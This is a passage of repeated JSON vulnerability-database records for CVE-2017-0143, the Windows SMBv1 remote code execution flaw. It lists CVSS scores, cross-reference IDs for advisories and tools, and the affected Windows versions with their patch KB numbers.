"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-11T20:47:14", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": 
["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KBMS16-110, 3187754", "KB3212646", "KB3210720", "KB4013198", "KB4012216", "KB3205401", "KB4012598", "KB3210721", "KB4013429", "KB4012217", "KB4012606", "KB4012212", "KB4012213", "KB3205409", "KB3213986", "KB3177186", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 
"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T20:47:14", "differentElements": ["msAffectedSoftware"], "edition": 35}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-11T22:53:48", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-11T22:53:48", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-11T22:53:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012212", "KB3210720", "KB4012606", "KB4012217", "KB3212646", "KB4012216", "KB4012214", "KBMS16-110, 3187754", "KB3213986", "KB4012598", "KB3205401", "KB3177186", "KB3210721", "KB4012213", "KB4012215", "KB3205409", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T22:53:48", "differentElements": ["msAffectedSoftware"], "edition": 36}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "e82055c0f190318442e2f0bde68f2113", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-12T04:44:31", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", 